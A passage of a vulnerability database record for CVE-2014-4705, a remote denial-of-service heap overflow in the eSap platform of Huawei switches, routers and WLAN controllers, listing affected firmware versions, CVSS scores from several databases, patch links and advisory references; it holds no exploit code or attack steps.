                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:srg2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg3300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:srg3300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6005_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:wlan_ac6005:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_ac6605_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:wlan_ac6605:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:wlan_acu2_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:wlan_acu2:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
      ],
   },
   cve: "CVE-2014-4705",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-4705",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2018-03422",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-72646",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-4705",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2014-4705",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2018-03422",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201801-1088",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-72646",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet. plural Huawei The product contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiCampusS9300 and other products are all products of China Huawei. CampusS9300 and other devices are all switch devices. WLAN AC6005 and so on are all access controller devices. eSapsoftwareplatform is a set of ESAP software platforms running on it. A heap buffer overflow vulnerability exists in eSapsoftwareplatform in several Huawei products. The Campus S9300 and others are switches. The following products and versions are affected: Huawei Campus S9300/ S7700/ S9700 Series switch V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC500 Version; Campus S5300/ S5700/ S6300/ S6700 Series switch V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; AR150/ AR160/ AR200/ AR1200/ AR2200/ AR3200/ AR530/ NetEngine16EX/ SRG1300/ SRG2300/ SRG3300 series router V200R003C01SPC900 Version, V200R003C01SPC300 Version, V200R003C01SPC100 Version, V200R003C00SPC200 Version, V200R003C00SPC100 Version, V200R005C00SPC100 Version, V200R005C00SPC200 Version; WLAN AC6005/6605 V200R003C00SPC100 Version, V200R003C00SPC200 Version, V200R003C00SPC300 Version , V200R003C00SPC500 version, V200R005C00SPC100 version; WLAN ACU2 V200R005C00SPC100 version",
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2014-4705",
            trust: 3.1,
         },
         {
            db: "SECUNIA",
            id: "59349",
            trust: 2.3,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   id: "VAR-201801-0045",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
      ],
      trust: 1.5067365069565217,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
      ],
   },
   last_update_date: "2023-12-18T13:24:12.576000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20140616-01-eSap",
            trust: 0.8,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
         },
         {
            title: "Patch of various Huawei products eSapsoftwareplatform heap buffer overflow vulnerability",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/116581",
         },
         {
            title: "Multiple Huawei product eSap software platform Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78164",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-119",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://secunia.com/advisories/59349",
         },
         {
            trust: 2.3,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345171.htm",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4705",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2014-4705",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-02-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            date: "2018-01-30T00:00:00",
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            date: "2018-03-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            date: "2018-01-30T17:29:00.227000",
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            date: "2018-01-31T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-02-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            date: "2018-02-26T00:00:00",
            db: "VULHUB",
            id: "VHN-72646",
         },
         {
            date: "2018-03-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            date: "2018-02-26T19:31:25.060000",
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            date: "2018-01-31T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Product buffer error vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer overflow",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
      trust: 0.6,
   },
}